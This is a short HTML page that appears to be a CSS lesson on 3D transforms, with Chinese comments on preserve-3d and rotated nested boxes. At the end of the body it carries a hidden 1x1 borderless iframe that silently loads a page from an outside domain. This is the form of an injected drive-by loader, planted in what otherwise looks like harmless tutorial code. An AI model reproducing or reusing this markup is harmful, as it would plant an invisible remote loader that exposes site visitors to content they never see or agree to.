<!DOCTYPE html>
<html>
<head lang="en">
    <meta charset="UTF-8">
    <title></title>
    <style>
        .out{
            width: 500px;
            height: 500px;
            border: 1px solid #000;
            background-color: pink;
            margin:100px auto;

            transform:rotateY(66deg);

            /*可以让里面的子盒子保持3d 效果，加给父盒子 */
            /* preseve-3d: 让子盒子 位于3d空间里面*/
            /*flat： 子盒子被扁平化*/
            transform-style:preserve-3d;
        }

        .in{
            width: 300px;
            height: 400px;
            background-color: red;
            margin:50px auto;
            transform:rotateX(132deg);
            border: 1px solid #000;
        }


    </style>
</head>
<body>
<div class="out">
    <div class="in"></div>
</div>
<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body>
</html>